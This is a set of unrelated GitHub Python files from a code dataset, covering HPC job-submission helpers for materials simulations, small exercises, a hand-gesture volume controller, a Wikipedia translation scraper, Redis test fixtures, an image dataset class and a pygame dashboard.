\"_\").replace(\"+\", \"_\")\n\n os.chdir(inputfile)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"runstruct_vasp -ng mpirun -np {self.n_of_cpu}\\n\"\n mpi += \"rm wait\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n # -- To show SGE queue system that \" I'm running now \"\n def pbs_runner(self):\n inputfile = self.inputfile\n\n jobname = inputfile.replace(\".py\", \"\")\n\n mpi = '''#!/bin/csh\n# Job name \n#$ -N %s\n\n# pe request\n%s\n\n# queue name\n%s\n\n# node\n%s\n\n#$ -V\n#$ -cwd\n\ncd $SGE_O_WORKDIR\n\npython %s\n\n ''' % (jobname, self.pe_request, self.queue_name, self.node_assign, inputfile)\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def lammps(self):\n inputfile = self.inputfile\n outputfile = inputfile.replace(\"in.\", \"out.\")\n\n jobname = \"L\" + inputfile.replace(\"in.\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"{self.lammps_mpirun_path} -np {self.n_of_cpu} {self.lammps_path} {inputfile} {outputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def AIMD_NVT_Loop(self, structure_filename=None, temp=None, specie=\"Li\", screen='no_screen', max_step=250, vdw=False):\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/Diffusion/NVTLoopQueScript.py\"\n os.system('cp %s ./.NVTLoopQueScript.py' % loop_opt_script)\n script_filename = \".NVTLoopQueScript.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n\n jobname = \"NVT%s_%dK\" % (structure_filename.replace(\".cif\", \"\"), temp)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += f\"{self.python_path} {script_filename} 
{structure_filename} {temp} {specie} {screen} {max_step} {vdw}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def AIMD_NVT_Loop_batch(self, structure_files=None, temp=None, specie=\"Li\", screen='no_screen', max_step=250, vdw=False):\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/Diffusion/NVTLoopQueScript.py\"\n os.system('cp %s ./.NVTLoopQueScript.py' % loop_opt_script)\n script_filename = \".NVTLoopQueScript.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n\n jobname = input(\"Job name: \")\n\n runs = \"\"\n pwd = os.getcwd()\n if 'structures' not in os.listdir('./'):\n os.mkdir('structures')\n for structure_filename in structure_files:\n dirname = structure_filename.replace(\".cif\", \"\")\n runs += \"cp %s structures; mkdir %s; mv %s %s; cp %s %s; cd %s\\n\" % (structure_filename, dirname, structure_filename, dirname, script_filename, dirname, dirname)\n runs += \"%s %s %s %s %s %s %s %s\\n\\n\" % (self.python_path, script_filename, structure_filename, temp, specie, screen, max_step, vdw)\n runs += \"cd %s \\n\" % pwd\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += runs\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def casm_run(self):\n jobname = raw_input(\"Job name: \")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += \"casm-calc --run\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def siesta(self):\n input_filename = self.inputfile.split(\"/\")[-1]\n dir_path = self.inputfile.replace(input_filename, \"\")\n jobname = \"S\" + input_filename.replace(\".fdf\", \"\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"{self.mpirun} -np {self.n_of_cpu} {self.siesta_path} < {dirpath} > siesta.out\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def siesta_AIMD_NVT_Loop(self, structure_filename=None, temp=None, specie=\"Li\"):\n # -- load loop queue script\n from CCpy.Package.Diffusion.SIESTA_NVTLoopQueScript import NVTLoopQueScriptString\n script_string = NVTLoopQueScriptString()\n script_filename = \".AIMDLoop.py\"\n f = open(script_filename, \"w\")\n f.write(script_string)\n f.close()\n\n jobname = \"SNVT%s_%dK\" % (structure_filename.replace(\".cif\", \"\"), temp)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"{self.python_path} {script_filename} {structure_filename} {temp} {specie}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", 
shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n","repo_name":"91bsjun/CCpy","sub_path":"CCpy/Queue/CCpyJobControl.py","file_name":"CCpyJobControl.py","file_ext":"py","file_size_in_byte":23168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37714196557","text":"def num(k):\n if k==1:\n return False\n else:\n for j in range(2,(k**(0.5)+1)):\n \n if k%j==0:\n return False\n return True \nshit_list=list(range(2,246912))\nans_list=[]\nfor i in shit_list:\n if num(i):\n ans_list.append(i)\n\nwhile True:\n n=int(input())\n if n==0:\n break\n ans=0\n for i in ans_list:\n if n promedios_autos:\n lista_mayores.append(i[1])\n\n\nlista_mayores2 =filter(lambda x: x > promedios_autos, lista_1)\nprint(lista_mayores)\n#operación funcional \nprint(list(lista_mayores2))","repo_name":"cherrux/Data_Science_Desafio_Latam","sub_path":"desafio7/untitled folder/Archive/listas_cinco.py","file_name":"listas_cinco.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22789810066","text":"import cv2\nimport mediapipe as mp\nimport hand_tracking_module as htm\nimport numpy as np\nimport math\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\n\nweight_cam, heigth_cam = 640, 480\n\ndetector = htm.handDetector(detectionCon=0.7)\ndevices = AudioUtilities.GetSpeakers()\ninterface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\nvolume = cast(interface, POINTER(IAudioEndpointVolume))\nvolRange = volume.GetVolumeRange()\nminVol = volRange[0]\nmaxVol = volRange[1]\nvol = 0\nvolBar = 400\nvolPer = 0\n\ndetector = htm.HandDetector(detection_con=0.7)\n\ncap = cv2.VideoCapture(0)\ncap.set(3, weight_cam)\ncap.set(4, heigth_cam)\n\nwhile cap.isOpened():\n success, img = cap.read()\n img = detector.find_hands(img)\n landmark_list = detector.find_position(img, draw=False)\n if landmark_list != None:\n x1, y1 = landmark_list[4][1], landmark_list[4][2]\n x2, y2 = landmark_list[8][1], landmark_list[8][2]\n cx, cy = (x1 + x2) // 2, (y1 + y2) // 2\n cv2.circle(img, (x1, y1), 15, (255, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 15, (255, 0, 255), cv2.FILLED)\n cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n\n length = math.hypot(x2 - x1, y2 - y1)\n vol = np.interp(length, [50, 300], [minVol, maxVol])\n volBar = np.interp(length, [50, 300], [400, 150])\n volPer = np.interp(length, [50, 300], [0, 100])\n print(int(length), vol)\n volume.SetMasterVolumeLevel(vol, None)\n\n if length < 50:\n cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n cv2.rectangle(img, (50, 150), (85, 400), (255, 0, 0), 3)\n cv2.rectangle(img, (50, int(volBar)), (85, 400), (255, 0, 0), cv2.FILLED)\n cv2.putText(img, f'{int(volPer)} %', (40, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 0, 0), 3)\n\n cv2.imshow('img', img)\n if cv2.waitKey(5) & 0XFF == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"zakaria-1990/gesture_volume_control","sub_path":"gesture_volume_control.py","file_name":"gesture_volume_control.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33440781857","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 05 2013 20:39:37 2013\r\n\r\n@author: t.gibon@gmail.com\r\n\"\"\"\r\n\r\nimport 
csv\r\nimport urllib\r\nimport codecs\r\nimport string\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef unicode_csv_reader(utf8_data, dialect=csv.excel, **kwargs):\r\n csv_reader = csv.reader(utf8_data, dialect=dialect, **kwargs)\r\n for row in csv_reader:\r\n yield [cell.decode('utf-8') for cell in row]\r\n\r\ndef mtranslate(to_translate, wiki_lang = 'en'):\r\n '''\r\n Return the translation using wikipedia\r\n you must shortcut the langage you define (French = fr, English = en, Spanish = es, etc...)\r\n if you don't define anything it will detect it or use english by default\r\n '''\r\n \r\n agents = {'User-Agent':\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)\"}\r\n link = \"http://%s.wikipedia.org/wiki/%s\" % (wiki_lang, to_translate.replace(\" \", \"_\"))\r\n request = urllib.request.Request(link, headers=agents)\r\n page = urllib.request.urlopen(request).read()\r\n parsed_html = BeautifulSoup(page, 'lxml')\r\n interwiki = parsed_html.body.findAll('li', attrs = {'class':re.compile('interwiki-')})\r\n pair = [each.find('a').get('title') for each in interwiki]\r\n\r\n code = [each.find('a').get('hreflang') for each in interwiki]\r\n\r\n result = list()\r\n result.append(tuple(code))\r\n\r\n pairs = [each.split(u' \\u2013 ') for each in pair]\r\n\r\n result.append([each[0] for each in pairs])\r\n result.append([each[1] for each in pairs])\r\n\r\n filename = codecs.open('output_' + to_translate.replace(\" \", \"_\") + '.txt','w', encoding='utf-8')\r\n filename.write(u'Language\\t' + to_translate + u'\\n')\r\n\r\n for i in range(len(pair)):\r\n each = pair[i].split(u' \\u2013 ')\r\n filename.write(code[i] + u'\\t' + each[1] + u'\\t' + each[0] + u'\\n')\r\n\r\n return result\r\n \r\ndef ipa(to_translate, wiki_lang = 'en'):\r\n \r\n reader = list(csv.reader(open('wiki_lang_codes.txt','rb'), delimiter='\\t'))\r\n lang_codes = [row[0] for row in reader]\r\n lang_names = [row[1] for row in reader]\r\n lang_names = [l.decode('utf-8') for l in lang_names]\r\n \r\n agents = {'User-Agent':\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)\"}\r\n link = \"http://%s.wiktionary.org/wiki/%s\" % (wiki_lang, string.lower(to_translate.replace(\" \", \"_\")))\r\n request = urllib.request.Request(link, headers=agents)\r\n page = urllib.request.urlopen(request).read()\r\n parsed_html = BeautifulSoup(page, 'lxml')\r\n \r\n lang_name = lang_names[lang_codes.index(wiki_lang)]\r\n parsed_html.body.findAll('span', attrs = {'id':lang_name})\r\n \r\n try:\r\n result = parsed_html.body.find('span', attrs = {'class':'IPA'}).contents[0]\r\n except:\r\n result = parsed_html.body.find('span', attrs = {'class':'API'}).contents[0]\r\n \r\n return result\r\n\r\ndef map_word_old(to_translate = 'love', from_language = 'en'):\r\n\r\n reader = list(csv.reader(open('Language_names.txt','rb'), delimiter='\\t'))\r\n lang_codes = [row[0] for row in reader[1:]]\r\n lang_names = [row[3] for row in reader[1:]]\r\n lang_names = [l.decode('utf-8') for l in lang_names]\r\n\r\n flower = mtranslate(to_translate,from_language)\r\n matches = list(set(flower[2]) & set(lang_names))\r\n non_matches = list((set(flower[2]) ^ set(lang_names)).intersection(set(lang_names)))\r\n\r\n to_replace = [lang_codes[lang_names.index(m)] for m in matches]\r\n replace_by = [flower[1][flower[2].index(m)] for m in matches]\r\n \r\n to_replace.extend([lang_codes[lang_names.index(m)] for m in non_matches])\r\n 
replace_by.extend([u'']*len(non_matches))\r\n \r\n replace_by = [re.sub(' \\(.*\\)','',s) for s in replace_by]\r\n \r\n test = codecs.open('Languages-Europe.svg','rU','utf-8').read()\r\n\r\n for i in range(len(to_replace)):\r\n test = test.replace(u'>' + to_replace[i] + u'','>' + replace_by[i] + u'')\r\n\r\n with codecs.open('Languages_Europe_' + to_translate + '.svg','wU','utf-8') as fi:\r\n fi.write(test)\r\n with codecs.open('Languages_Europe_last_output.svg','wU','utf-8') as fi2:\r\n fi2.write(test)\r\n \r\ndef map_word(to_translate = 'love', from_language = 'en'):\r\n '''\r\n This in an updated version of map_word_old, using a more legible map\r\n '''\r\n\r\n reader = list(csv.reader(open('Language_names.txt','rt',encoding = 'utf-8'), delimiter='\\t'))\r\n lang_codes = [row[0] for row in reader[1:]]\r\n lang_names = [row[1] for row in reader[1:]]\r\n\r\n flower = mtranslate(to_translate, from_language)\r\n matches = list(set(flower[2]) & set(lang_names))\r\n non_matches = list((set(flower[2]) ^ set(lang_names)).intersection(set(lang_names)))\r\n\r\n to_replace = [lang_codes[lang_names.index(m)] for m in matches]\r\n replace_by = [flower[1][flower[2].index(m)].lower() for m in matches]\r\n \r\n to_replace.extend([lang_codes[lang_names.index(m)] for m in non_matches])\r\n replace_by.extend([u'']*len(non_matches))\r\n \r\n to_replace.append(u'word')\r\n replace_by.append(u'\\\"' + to_translate + '\\\" in Europe') \r\n \r\n replace_by = [re.sub(' \\(.*\\)','',s) for s in replace_by]\r\n \r\n test = codecs.open('Simplified_Languages_of_Europe_map_base.svg','rU','utf-8').read()\r\n\r\n for i in range(len(to_replace)):\r\n test = test.replace(u'style=\"font-style:normal;-inkscape-font-specification:Arial\">' + to_replace[i] + u'',\r\n u'style=\"font-style:normal;-inkscape-font-specification:Arial\">' + replace_by[i] + u'')\r\n \r\n with codecs.open('Simplified_Languages_of_Europe_map_' + to_translate + '.svg','w','utf-8') as fi:\r\n fi.write(test)\r\n with codecs.open('Simplified_Languages_of_Europe_map_last_output.svg','w','utf-8') as fi2:\r\n fi2.write(test)\r\n \r\nif __name__ == '__main__':\r\n to_translate = 'love'\r\n language = 'en'\r\n mtranslate(to_translate, language)\r\n","repo_name":"thomasgibon/etymologymaps","sub_path":"map_word.py","file_name":"map_word.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74698884613","text":"import subprocess\nfrom time import sleep\n\nimport pytest\nimport redis\n\n@pytest.fixture(scope='module')\ndef server():\n with subprocess.Popen(['animals']) as server:\n sleep(3)\n yield\n server.kill()\n\n@pytest.fixture\ndef preload():\n \"\"\"\n Flush all items from the DB, but preserve the farmer if the\n server set it on startup. 
Add a few animals.\n \"\"\"\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n farmer = r.hgetall('animals:user:farmer')\n r.flushdb()\n if farmer:\n r.hmset('animals:user:farmer', farmer)\n\n r.set('animals:item:cow', 'moo')\n r.set('animals:item:chicken', 'cluck')\n r.set('animals:item:pig', 'oink') \n","repo_name":"appeltel/webservice-animals","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22728437719","text":"# --- Imports --- #\r\nimport torch\r\nimport torch.utils.data as data\r\nfrom torchvision.transforms import Compose, ToTensor\r\nfrom UCM.ucm import ucm\r\n\r\n\r\n# --- Haze-Wild dataset --- #\r\nclass Haze_Wild(data.Dataset):\r\n\r\n def __init__(self, images_path, labels, crop_size, filters, method=0, mode='train'):\r\n\r\n if mode == 'train':\r\n self.image_path = images_path\r\n print(\"Total training examples:\", len(self.image_path))\r\n elif mode == 'val':\r\n self.image_path = images_path\r\n print(\"Total validation examples:\", len(self.image_path))\r\n else:\r\n self.image_path = images_path\r\n print(\"Total test examples:\", len(self.image_path))\r\n\r\n self.labels = labels\r\n self.crop_size = crop_size\r\n self.method = method\r\n self.filters = filters\r\n\r\n def get_images(self, index):\r\n method = self.method\r\n seg_img, org_img = ucm(self.image_path[index], self.crop_size, self.filters, method)\r\n label = self.labels[index]\r\n\r\n transform = Compose([ToTensor()])\r\n seg = transform(seg_img)\r\n org = transform(org_img)\r\n if method == 0:\r\n return org, label\r\n else:\r\n return torch.cat((seg, org)), label\r\n\r\n def __getitem__(self, index):\r\n res = self.get_images(index)\r\n return res\r\n\r\n def __len__(self):\r\n return len(self.image_path)\r\n","repo_name":"JYBlank-L/Unsupervised-Contrastive-Masking-for-Visual-Haze-Classification","sub_path":"datasets/Wild1.py","file_name":"Wild1.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20721496143","text":"import pygame\nimport time\nimport datetime\nimport requests\nfrom pprint import pprint\nimport pygame\nfrom pygame.locals import *\nimport random\nfrom Data import Data\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom ControlPanelClass import ControlPanel_main\n\n\nimageDirectory = \"/Users/atulphadke/Documents/Energy/images/\"\nfontDirectory = \"/Users/atulphadke/Documents/Energy/fonts/\"\npreviousRes = 0\nnewRes = 0\npreviousImage = imageDirectory + \"beginning.png\"\nnewImage = imageDirectory + \"beginning.png\"\nfirstTime = 0\n\npygame.init()\nscreen = pygame.display.set_mode((1024, 600))\nrectBlack = pygame.Rect(0, 0, 1024, 600)\nclock = pygame.time.Clock()\n\ndef ControlPanelButton(imageDirectory, fontDirectory, screen):\n x, y = pygame.mouse.get_pos()\n if x >= 585 and x <= 775 and y <= 575 and y >= 515:\n button = pygame.image.load(imageDirectory + \"HoverControlPanel.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (550, 500))\n if event.type == pygame.MOUSEBUTTONDOWN:\n print(\"a\")\n verticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n edges = (\n (0,1),\n (0,3),\n (0,4),\n (2,1),\n (2,3),\n (2,7),\n (6,3),\n (6,4),\n (6,7),\n (5,1),\n (5,4),\n (5,7)\n )\n display = (1024,600)\n screen = 
pygame.display.set_mode((1024,600), DOUBLEBUF|OPENGL)\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n glTranslatef(0.0,0.0, -5)\n speed = 1\n i = 0\n v = 0\n change = 1\n maxRotations = 9\n minRotations = -9\n fin = False\n while True:\n if i == 10:\n speed = speed - change\n i = 0\n if speed == minRotations:\n change = -1\n if speed == maxRotations:\n change = 1\n glRotatef(speed, 0, 2, 0)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n pygame.display.flip()\n #pygame.time.wait(10)\n i = i + 1\n v = v + 5\n if v == 1500:\n v = 0\n screen = pygame.display.set_mode((1024, 600))\n fin = True\n return fin\n else:\n button = pygame.image.load(imageDirectory + \"ControlPanel.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (550, 500))\n\ndef ResetButton(imageDirectory, fontDirectory):\n x, y = pygame.mouse.get_pos()\n if x >= 785 and x <= 975 and y <= 575 and y >= 515:\n button = pygame.image.load(imageDirectory + \"HoverRoundedRectangle.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (750, 500))\n if event.type == pygame.MOUSEBUTTONDOWN:\n print(\"a\")\n verticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n\n edges = (\n (0,1),\n (0,3),\n (0,4),\n (2,1),\n (2,3),\n (2,7),\n (6,3),\n (6,4),\n (6,7),\n (5,1),\n (5,4),\n (5,7)\n )\n def Cube():\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n glEnd()\n def main():\n display = (1024,600)\n screen = pygame.display.set_mode((1024,600), DOUBLEBUF|OPENGL)\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n glTranslatef(0.0,0.0, -5)\n speed = 1\n i = 0\n v = 0\n change = 1\n maxRotations = 9\n minRotations = -9\n fin = False\n while True:\n if i == 10:\n speed = speed - change\n i = 0\n if speed == minRotations:\n change = -1\n if speed == maxRotations:\n change = 1\n glRotatef(speed, 0, 2, 0)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n Cube()\n pygame.display.flip()\n #pygame.time.wait(10)\n i = i + 1\n v = v + 5\n if v == 500:\n v = 0\n screen = pygame.display.set_mode((1024, 600))\n fin = True\n return fin\n main()\n finish = main()\n if finish == True:\n return finish\n else:\n button = pygame.image.load(imageDirectory + \"Rounded_Rectangle.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (750, 500))\ndef Megamanand10800A(imageDirectory, fontDirectory):\n megaman = imageDirectory + \"sprite_09.png\"\n loadingicons = pygame.image.load(megaman)\n loadingicons = pygame.transform.scale(loadingicons, (200, 200))\n screen.blit(loadingicons, (780, 180))\n Team = pygame.font.Font(fontDirectory + 'BebasNeueBold.ttf', 90)\n Teams = Team.render(\"10800A\", 40, (255, 255, 255))\n screen.blit(Teams, (770, 380))\ndef CarbonDioxide(maximum, imageDirectory, fontDirectory):\n H20 = 500\n if H20 <= (maximum/30):\n image = imageDirectory + \"frame_00_delay-0.33s.png\"\n\n elif (maximum/30)*2 <= H20 <= (maximum/30)*3:\n image = imageDirectory + \"frame_01_delay-0.33s.png\"\n\n elif (maximum/30)*3 <= H20 <= (maximum/30)*4:\n image = imageDirectory + \"frame_02_delay-0.33s.png\"\n\n elif (maximum/30)*4 <= H20 <= (maximum/30)*5:\n image = imageDirectory + \"frame_03_delay-0.33s.png\"\n\n elif (maximum/30)*5 <= H20 <= (maximum/30)*6:\n image = imageDirectory + \"frame_04_delay-0.33s.png\"\n\n elif (maximum/30)*6 <= 
H20 <= (maximum/30)*7:\n image = imageDirectory + \"frame_05_delay-0.33s.png\"\n\n elif (maximum/30)*7 <= H20 <= (maximum/30)*8:\n image = imageDirectory + \"frame_06_delay-0.33s.png\"\n\n elif (maximum/30)*8 <= H20 <= (maximum/30)*9:\n image = imageDirectory + \"frame_07_delay-0.33s.png\"\n\n elif (maximum/30)*9 <= H20 <= (maximum/30)*10:\n image = imageDirectory + \"frame_08_delay-0.33s.png\"\n\n elif (maximum/30)*10 <= H20 <= (maximum/30)*11:\n image = imageDirectory + \"frame_09_delay-0.33s.png\"\n\n elif (maximum/30)*11 <= H20 <= (maximum/30)*12:\n image = imageDirectory + \"frame_10_delay-0.33s.png\"\n\n elif (maximum/30)*12 <= H20 <= (maximum/30)*13:\n image = imageDirectory + \"frame_11_delay-0.33s.png\"\n\n elif (maximum/30)*13 <= H20 <= (maximum/30)*14:\n image = imageDirectory + \"frame_12_delay-0.33s.png\"\n\n elif (maximum/30)*14 <= H20 <= (maximum/30)*15:\n image = imageDirectory + \"frame_13_delay-0.33s.png\"\n\n elif (maximum/30)*15 <= H20 <= (maximum/30)*16:\n image = imageDirectory + \"frame_14_delay-0.33s.png\"\n\n elif (maximum/30)*16 <= H20 <= (maximum/30)*17:\n image = imageDirectory + \"frame_15_delay-0.33s.png\"\n\n elif (maximum/30)*17 <= H20 <= (maximum/30)*18:\n image = imageDirectory + \"frame_16_delay-0.33s.png\"\n\n elif (maximum/30)*18 <= H20 <= (maximum/30)*19:\n image = imageDirectory + \"frame_17_delay-0.33s.png\"\n\n elif (maximum/30)*19 <= H20 <= (maximum/30)*20:\n image = imageDirectory + \"frame_18_delay-0.33s.png\"\n\n elif (maximum/30)*20 <= H20 <= (maximum/30)*21:\n image = imageDirectory + \"frame_19_delay-0.33s.png\"\n\n elif (maximum/30)*21 <= H20 <= (maximum/30)*22:\n image = imageDirectory + \"frame_20_delay-0.33s.png\"\n\n elif (maximum/30)*22 <= H20 <= (maximum/30)*23:\n image = imageDirectory + \"frame_21_delay-0.33s.png\"\n\n elif (maximum/30)*23 <= H20 <= (maximum/30)*24:\n image = imageDirectory + \"frame_22_delay-0.33s.png\"\n\n elif (maximum/30)*24 <= H20 <= (maximum/30)*25:\n image = imageDirectory + \"frame_23_delay-0.33s.png\"\n\n elif (maximum/30)*25 <= H20 <= (maximum/30)*26:\n image = imageDirectory + \"frame_24_delay-0.33s.png\"\n\n elif (maximum/30)*26 <= H20 <= (maximum/30)*27:\n image = imageDirectory + \"frame_25_delay-0.33s.png\"\n\n elif (maximum/30)*27 <= H20 <= (maximum/30)*28:\n image = imageDirectory + \"frame_26_delay-0.33s.png\"\n\n elif (maximum/30)*28 <= H20 <= (maximum/30)*29:\n image = imageDirectory + \"frame_27_delay-0.33s.png\"\n\n elif (maximum/30)*29 <= H20 >= maximum:\n image = imageDirectory + \"frame_28_delay-0.33s.png\"\n\n elif H20 >= maximum:\n image = imageDirectory + \"frame_29_delay-0.33s.png\"\n\n loadingicon = pygame.image.load(image)\n loadingicon = pygame.transform.scale(loadingicon, (200, 200))\n screen.blit(loadingicon, (20, 450))\n\ndef GetTempData(imageDirectory, fontDirectory):\n x = datetime.datetime.now()\n url = 'http://openweathermap.org/data/2.5/weather?q={}&appid=b6907d289e10d714a6e88b30761fae22'.format(\"Nashua\")\n res = requests.get(url)\n data = res.json()\n temp = data['main']['temp']\n templow = data['main']['temp_min']\n templow = templow*(9/5) + 32\n temphigh = data['main']['temp_max']\n temphigh = temphigh*(9/5) + 32\n weathers = data['weather'][0]['main']\n temp = temp*(9/5) + 32\n return temp, templow, temphigh, weathers\n\ndef GetWeatherTempData(temp, templow, temphigh, weathers, imageDirectory, fontDirectory):\n x = datetime.datetime.now()\n if temp <= 40:\n status = 'Cold'\n Status = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 30)\n ColdHotMild = 
Status.render(status, 10, (255, 255, 255))\n #screen.blit(s, (20, 100))\n elif temp >= 80:\n status = 'Hot'\n Status = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 30)\n ColdHotMild = Status.render(status, 10, (255, 255, 255))\n #screen.blit(s, (20, 100))\n else:\n status = 'Mild'\n Status = pygame.font.Font(fontDirectory + 'NanumGothic-Regular.ttf', 30)\n ColdHotMild = Status.render(status, 10, (255, 255, 255))\n #screen.blit(s, (20, 100))\n if weathers == 'Rain':\n weathericon = pygame.image.load(imageDirectory + \"rain.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif int(x.strftime(\"%H\")) >= 17 or int(x.strftime(\"%H\")) <= 5:\n weathericon = pygame.image.load(imageDirectory + \"Moon1.png\")\n DNweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (340, 10))\n elif weathers == 'Clouds':\n weathericon = pygame.image.load(imageDirectory + \"clouds.png\")\n Wweathericon = pygame.transform.scale(weathericon, (100, 100))\n #screen.blit(weathericon, (220, 10))\n if 6 <= int(x.strftime(\"%H\")) <= 16:\n weathericon = pygame.image.load(imageDirectory + \"Sunny.png\")\n DNweathericon = 